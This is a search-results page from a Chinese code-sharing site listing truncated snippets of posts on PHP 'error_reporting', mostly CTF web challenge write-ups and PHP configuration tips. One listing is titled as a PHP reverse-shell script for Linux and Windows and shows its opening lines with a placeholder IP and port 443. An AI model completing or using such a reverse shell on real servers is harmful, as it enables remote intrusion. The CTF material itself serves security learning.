码迷,mamicode.com
首页 >  
搜索关键字:error_reporting    ( 208个结果
php_bugs学习 02 绕过过滤的空白字符
<?php $info = ""; $req = []; $flag="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; ini_set("display_error", false); //为一个配置选项设置值 error_reporting(0); //关闭所有PHP错 ...
分类:Web程序   时间:2021-07-05 19:06:03    阅读次数:0
PHP反弹脚本 Linux/Windows两用
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
分类:Windows程序   时间:2021-07-05 19:00:38    阅读次数:0
[RoarCTF 2019]Easy Calc
点开题目,发现只是一个计算框 查看一下源代码 发现了一串代码 .ajax是指通过http请求加载远程数据 输入的算式会被传进calc.php文件中 且提示网页存在waf(就是防火墙) 访问cala.php试试 有一串php代码 1 <?php 2 error_reporting(0); 3 if(! ...
分类:其他好文   时间:2021-06-13 09:27:14    阅读次数:0
CTF web之旅 45
提示备份文件 直接url/www.zip得到源代码 分别得到以下关键代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesy ...
分类:Web程序   时间:2021-06-08 22:34:20    阅读次数:0
iscc寻找小明3
题目地址 http://101.201.126.95:7012/ 访问 key.php 跳转 F12查看源码 <?php <head> <title>ISCC | 寻找小明</title> <style> <p>他究竟在哪呢... </div>。。。 <!-- error_reporting(0); ...
分类:其他好文   时间:2021-04-05 12:17:05    阅读次数:0
CTF web每日一题
error_reporting(0);// 关闭错误报告 session_start();//启动会话 require('./flag.php'); if(!isset($_SESSION['nums'])){//isset() — 检测nums变量是否设置。 $_SESSION['nums'] = ...
分类:Web程序   时间:2021-02-01 11:42:42    阅读次数:0
php--Undefined variable警告处理
PHP默认的配置会报这个错误 解决方法: 1、修改配置文件 打开php.ini文件error_reporting设置: 找到error_reporting=E_ALL 修改为error_reporting=E_ALL & ~E_NOTICE 2、 在文件的php的头部加入一下代码: ini_set( ...
分类:Web程序   时间:2020-08-17 17:44:35    阅读次数:78
php在代码中开启或关闭错误提示并将错误写入日志
//ini_set('error_reporting', 0); ini_set('error_reporting',E_ALL);//设置报告错误级别 $debug = false; if($debug){ //为true时,将错误显示在浏览器 ini_set("display_errors"," ...
分类:Web程序   时间:2020-07-19 17:43:48    阅读次数:95
[CISCN 2019 初赛]Love Math
1 <?php 2 error_reporting(0); 3 //听说你很喜欢数学,不知道你是否爱它胜过爱flag 4 if(!isset($_GET['c'])){ 5 show_source(__FILE__); 6 }else{ 7 //例子 c=20-1 8 $content = $_GE ...
分类:其他好文   时间:2020-07-13 16:52:52    阅读次数:83
PHP代码审计分段讲解(9)
22 弱类型整数大小比较绕过 <?php error_reporting(0); $flag = "flag{test}"; $temp = $_GET['password']; is_numeric($temp)?die("no numeric"):NULL; if($temp>1336){ ec ...
分类:Web程序   时间:2020-07-13 13:37:12    阅读次数:93
208条   1 2 3 4 ... 21 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!